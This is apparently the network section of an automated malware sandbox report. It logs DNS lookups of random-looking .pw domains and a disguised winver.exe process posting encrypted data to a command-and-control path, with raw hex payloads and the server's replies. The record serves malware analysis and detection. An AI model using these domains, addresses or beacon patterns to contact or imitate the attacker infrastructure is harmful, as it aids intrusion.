Jan 20, 2024 20:41:42.670442104 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:42.825643063 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:43.687911034 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:43.842346907 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:43.842545033 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:43.842658997 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:43.996819973 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:43.996901035 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:44.151101112 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:44.151778936 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:44.151809931 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:44.151974916 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:44.152224064 CET | 49739 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:44.306319952 CET | 80 | 49739 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.281513929 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.435940027 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.436049938 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.528111935 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.682406902 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.682504892 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.836764097 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.837436914 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.837450027 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
Jan 20, 2024 20:41:45.837616920 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.841912985 CET | 49740 | 80 | 192.168.2.4 | 216.218.185.162
Jan 20, 2024 20:41:45.996149063 CET | 80 | 49740 | 216.218.185.162 | 192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:46.749911070 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:46.905324936 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:46.905608892 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:46.905610085 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.060825109 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.060883045 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.216280937 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.216798067 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.216813087 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.217039108 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.217381954 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:47.372519016 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.140640974 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.295020103 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.295171976 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.295231104 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.449454069 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.449649096 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.603910923 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604362965 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604379892 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.604687929 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.604973078 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:48.759226084 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.671741009 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.827025890 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.827136040 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.827227116 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:49.982502937 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:49.982614040 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:50.138786077 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140456915 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140474081 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:50.140702009 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:41:56.085191011 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:56.140013933 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:02.088078022 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:02.140111923 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:08.086219072 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:08.140036106 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:14.087224960 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:14.140031099 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:20.087171078 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:20.140094042 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:26.083926916 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:26.124407053 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:32.096539021 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:32.140062094 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:38.086131096 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:38.140057087 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:44.084769011 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:44.140048027 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:50.084806919 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:50.140110970 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:56.083399057 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:56.124511957 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:02.089776039 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:02.140157938 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:08.087153912 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:08.140094042 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:14.085644007 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:14.140183926 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:20.091068029 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:20.140271902 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 20, 2024 20:41:01.005306005 CET5862653192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:01.758816957 CET53586261.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:34.197884083 CET6304153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:34.638372898 CET53630411.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.848987103 CET5385653192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:40.408725023 CET53538561.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.249921083 CET6004553192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:41.820075989 CET53600451.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.670917988 CET5865153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:43.146290064 CET53586511.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:44.152683973 CET5529253192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:44.901298046 CET53552921.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.842540026 CET5561453192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:46.378681898 CET53556141.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.217844963 CET5184153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:47.777020931 CET53518411.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.605392933 CET5143853192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:49.305752993 CET53514381.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 20, 2024 20:41:01.005306005 CET | 192.168.2.4 | 1.1.1.1 | 0xa92 | Standard query (0) | spaines.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:34.197884083 CET | 192.168.2.4 | 1.1.1.1 | 0x58c1 | Standard query (0) | uyhgqunqkxnx.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:39.848987103 CET | 192.168.2.4 | 1.1.1.1 | 0x7d30 | Standard query (0) | vcklmnnejwxx.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:41.249921083 CET | 192.168.2.4 | 1.1.1.1 | 0x801d | Standard query (0) | cmnsgscccrej.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:42.670917988 CET | 192.168.2.4 | 1.1.1.1 | 0xc6ce | Standard query (0) | evbsdqvgmpph.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:44.152683973 CET | 192.168.2.4 | 1.1.1.1 | 0x68ec | Standard query (0) | mfueeimvyrsp.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:45.842540026 CET | 192.168.2.4 | 1.1.1.1 | 0x6d61 | Standard query (0) | utmyhnffxpcj.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:47.217844963 CET | 192.168.2.4 | 1.1.1.1 | 0x8f77 | Standard query (0) | fkmmvfeonnyh.pw | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:48.605392933 CET | 192.168.2.4 | 1.1.1.1 | 0xea19 | Standard query (0) | gfnlmtcolrrb.pw | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 20, 2024 20:41:01.758816957 CET | 1.1.1.1 | 192.168.2.4 | 0xa92 | No error (0) | spaines.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:34.638372898 CET | 1.1.1.1 | 192.168.2.4 | 0x58c1 | No error (0) | uyhgqunqkxnx.pw | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:34.638372898 CET | 1.1.1.1 | 192.168.2.4 | 0x58c1 | No error (0) | uyhgqunqkxnx.pw | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:34.638372898 CET | 1.1.1.1 | 192.168.2.4 | 0x58c1 | No error (0) | uyhgqunqkxnx.pw | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:40.408725023 CET | 1.1.1.1 | 192.168.2.4 | 0x7d30 | No error (0) | vcklmnnejwxx.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:41.820075989 CET | 1.1.1.1 | 192.168.2.4 | 0x801d | No error (0) | cmnsgscccrej.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:43.146290064 CET | 1.1.1.1 | 192.168.2.4 | 0xc6ce | No error (0) | evbsdqvgmpph.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:44.901298046 CET | 1.1.1.1 | 192.168.2.4 | 0x68ec | No error (0) | mfueeimvyrsp.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:46.378681898 CET | 1.1.1.1 | 192.168.2.4 | 0x6d61 | No error (0) | utmyhnffxpcj.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:47.777020931 CET | 1.1.1.1 | 192.168.2.4 | 0x8f77 | No error (0) | fkmmvfeonnyh.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Jan 20, 2024 20:41:49.305752993 CET | 1.1.1.1 | 192.168.2.4 | 0xea19 | No error (0) | gfnlmtcolrrb.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449735216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:33.804089069 CET93OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: spaines.pw
                                                                                                                                                              Content-Length: 157
    Data Raw: 71 72 15 f5 52 7a 15 f5 1a ea 4f 98 77 70 14 d6 41 42 25 c5 41 42 25 c5
    Data Ascii: qrRzOwpAB%AB%
Jan 20, 2024 20:41:33.960119963 CET | 133 | OUT | Data Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 51 1f 7d 8b b1 fa 20 7f d5 68 20 b9 64 2d 3f 5d 75 5b 59 96 08 6f c1 78 ed b9 d0 35 6a c9 d1 e5 40 d4 82 f1 9f ac 7f af df 22 ef b5 be
    Data Ascii: w{&QYg6u#aQ} h d-?]u[Yox5j@"E{=sg(WEa)Vr:*9P/s;w\I}E cL
Jan 20, 2024 20:41:34.114938974 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:34 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 178.62.201.34 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:39.347423077 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: uyhgqunqkxnx.pw
    Content-Length: 157
    Data Raw: 17 36 54 98 31 3e 54 98 7c ae 0e f5 11 34 55 bb 27 06 64 a8 27 06 64 a8
    Data Ascii: 6T1>T|4U'd'd
Jan 20, 2024 20:41:39.548875093 CET | 133 | OUT | Data Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 39 4a f8 f8 69 9c bb 58 67 95 f1 e5 10 ce c9 7a 29 76 e2 6c 49 27 bf 3d ce 18 35 7b 8e 77 8d a5 69 52 2e d0 b6 8b 3f fb 10 5a d0 0a ff
    Data Ascii: qd6^Yg6u#a9JiXgz)vlI'=5{wiR.?Z[SUEn&uaKb*)&;Q[NYG<:M@!=7
Jan 20, 2024 20:41:39.847723007 CET | 75 | IN | HTTP/1.0 200 OK
    Date: Sat, 20 Jan 2024 19:41:39 GMT
    Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:40.938841105 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: vcklmnnejwxx.pw
    Content-Length: 157
    Data Raw: 46 b7 57 5a 61 bf 57 5a 2d 2f 0d 37 40 b5 56 79 76 87 67 6a 76 87 67 6a
    Data Ascii: FWZaWZ-/7@Vyvgjvgj
Jan 20, 2024 20:41:41.093404055 CET | 133 | OUT | Data Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 09 ac 5d 2b cd 11 51 be 0d 21 32 ce 0e 27 ca 14 6b 83 32 28 44 94 35 9a 02 1e 4f d9 63 c0 ff 27 57 aa 03 30 79 fe 7f 27 3b 5c 8d 3e 64
    Data Ascii: rx-QYg6u#a]+Q!2'k2(D5Oc'W0y';\>d!RI~=nq>)BZR?P9%Iu/
Jan 20, 2024 20:41:41.248694897 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:41 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49738 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:42.359144926 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: cmnsgscccrej.pw
    Content-Length: 157
    Data Raw: 8a 6a 6e 07 a2 62 6e 07 e1 f2 34 6a 8c 68 6f 24 ba 5a 5e 37 ba 5a 5e 37
    Data Ascii: jnbn4jho$Z^7Z^7
Jan 20, 2024 20:41:42.514324903 CET | 133 | OUT | Data Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 9a 7e 0d f6 e5 fb 81 6b d7 15 c2 1b 43 11 fa f9 de 31 42 c5 50 0a 65 6f 0f 64 9f 2d c3 b7 0f db 5a 3a 33 cf 96 4f 2f dc c6 77 d2 c9 a0
    Data Ascii: gr0TYg6u#a~kC1BPeod-Z:3O/w^U^EC(>U~~V&b9
Jan 20, 2024 20:41:42.669940948 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:42 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:43.842658997 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: evbsdqvgmpph.pw
    Content-Length: 157
    Data Raw: c9 d0 3a ba e1 d8 3a ba a2 48 60 d7 cf d2 3b 99 f9 e0 0a 8a f9 e0 0a 8a
    Data Ascii: ::H`;
Jan 20, 2024 20:41:43.996901035 CET | 133 | OUT | Data Raw: 00 80 00 00 00 61 e8 f2 07 71 32 bb a5 07 56 ca 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 56 b8 bf 58 5f 57 7f c9 65 bf 6c bd 6c 15 a8 5b 60 b0 10 7b 6a 0c f9 cc c3 9a 73 8a d8 9c bb 78 4c b0 47 63 1f 31 bb 70 cf e8 46 6d 2b
    Data Ascii: aq2VYg6u#aVX_Well[`{jsxLGc1pFm+n_a3@|lgzCbW?OA:Tq7!o
Jan 20, 2024 20:41:44.151778936 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:44 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:45.528111935 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: mfueeimvyrsp.pw
    Content-Length: 157
    Data Raw: 4a 7b a7 87 63 73 a7 87 21 e3 fd ea 4c 79 a6 a4 7a 4b 97 b7 7a 4b 97 b7
    Data Ascii: J{cs!LyzKzK
Jan 20, 2024 20:41:45.682504892 CET | 133 | OUT | Data Raw: 00 80 00 00 00 69 f8 e5 11 70 2a a0 b4 13 54 c9 81 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 4f a2 b6 0d 48 0e 48 9c 14 0d 15 90 69 f2 a0 76 f3 80 08 4e ab 9c db f9 e2 b9 51 b7 45 1d ac 43 91 26 5e 54 53 52 b0 5b fe bf 7f 42 c8
    Data Ascii: ip*TYg6u#aOHHivNQEC&^TSR[BE8+H5`b~P""2)Q8J|~#
Jan 20, 2024 20:41:45.837436914 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:45 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:46.905610085 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: utmyhnffxpcj.pw
    Content-Length: 157
    Data Raw: ce a6 09 2f e4 ae 09 2f a5 3e 53 42 c8 a4 08 0c fe 96 39 1f fe 96 39 1f
    Data Ascii: //>SB99
Jan 20, 2024 20:41:47.060883045 CET | 133 | OUT | Data Raw: 00 80 00 00 00 71 ea fd 0d 7d 2d ab a4 12 56 d9 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 83 f3 e3 c2 f9 8e 3a 57 b8 37 ab 24 53 8a 6d c2 4a 5b db f2 10 fb 8e 44 bf 58 26 02 e1 c1 60 f0 3d c2 aa 1b 2f 3a 84 08 5d 9c 2b 15 af
    Data Ascii: q}-VYg6u#a:W7$SmJ[DX&`=/:]+m <D-WKuK`KxV:c%Gc5n,|@lU
Jan 20, 2024 20:41:47.216798067 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:47 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49742 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:48.295231104 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: fkmmvfeonnyh.pw
    Content-Length: 157
    Data Raw: fc 54 53 d8 d6 5c 53 d8 97 cc 09 b5 fa 56 52 fb cc 64 63 e8 cc 64 63 e8
    Data Ascii: TS\SVRdcdc
Jan 20, 2024 20:41:48.449649096 CET | 133 | OUT | Data Raw: 00 80 00 00 00 62 f5 fd 19 63 25 a8 ad 04 48 c3 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 3a 58 ba ab 40 3e 74 3e 6c f2 11 4e 67 fc a7 94 81 0c 0d a8 ea 87 d7 1b 53 c2 6d 59 5a 21 d9 a7 8c 23 65 b0 fc 3f 5d a7 8c 25 60 be c7
    Data Ascii: bc%HYg6u#a:X@>t>lNgSmYZ!#e?]%`p&GV_P,|R-u'-%[xU4
Jan 20, 2024 20:41:48.604362965 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:48 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49743 | 216.218.185.162 | 80 | 7396 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Jan 20, 2024 20:41:49.827227116 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: gfnlmtcolrrb.pw
    Content-Length: 157
    Data Raw: b3 59 ba 92 98 51 ba 92 d8 c1 e0 ff b5 5b bb b1 83 69 8a a2 83 69 8a a2
    Data Ascii: YQ[ii
Jan 20, 2024 20:41:49.982614040 CET | 133 | OUT | Data Raw: 00 80 00 00 00 63 f8 fe 18 78 37 ae ad 06 54 c8 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 0e 68 13 65 d1 aa eb f4 85 50 f8 88 5a c4 1c 6e f7 eb 64 56 3a af 7f e0 59 ab f5 9e d8 25 31 6c ec e4 dd 7f 27 ba 35 6d fc ff f8 78 f0
    Data Ascii: cx7TYg6u#ahePZndV:Y%1l'5mx8{s Iwx7V98I,mqKG
Jan 20, 2024 20:41:50.140456915 CET | 137 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 20 Jan 2024 19:41:50 GMT
    Content-Type: application/octet-stream
    Connection: close
Jan 20, 2024 20:41:50.140474081 CET | 1 | IN | Data Raw: 51
    Data Ascii: Q
Jan 20, 2024 20:41:56.085191011 CET | 1 | IN | Data Raw: 74
    Data Ascii: t
Jan 20, 2024 20:42:02.088078022 CET | 1 | IN | Data Raw: 61
    Data Ascii: a
Jan 20, 2024 20:42:08.086219072 CET | 1 | IN | Data Raw: 4d
    Data Ascii: M
Jan 20, 2024 20:42:14.087224960 CET | 1 | IN | Data Raw: 57
    Data Ascii: W
Jan 20, 2024 20:42:20.087171078 CET | 1 | IN | Data Raw: 61
    Data Ascii: a
Jan 20, 2024 20:42:26.083926916 CET | 1 | IN | Data Raw: 4b
    Data Ascii: K
Jan 20, 2024 20:42:32.096539021 CET | 1 | IN | Data Raw: 64
    Data Ascii: d
Jan 20, 2024 20:42:38.086131096 CET | 1 | IN | Data Raw: 4f
    Data Ascii: O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 173.222.162.32 | 443 | 4984 | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

Timestamp | Bytes transferred | Direction | Data
2024-01-20 19:41:14 UTC | 2301 | OUT | POST /threshold/xls.aspx HTTP/1.1
    Origin: https://www.bing.com
    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
    Accept: */*
    Accept-Language: en-CH
    Content-type: text/xml
    X-Agent-DeviceId: 01000A4109000CC6
    X-BM-CBT: 1696420817
    X-BM-DateFormat: dd/MM/yyyy
    X-BM-DeviceDimensions: 784x984
    X-BM-DeviceDimensionsLogical: 784x984
    X-BM-DeviceScale: 100
    X-BM-DTZ: 60
    X-BM-Market: CH
    X-BM-Theme: 000000;0078d7
                                                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                              X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
                                                                                                                                                              X-Device-isOptin: false
                                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                              X-Device-OSSKU: 48
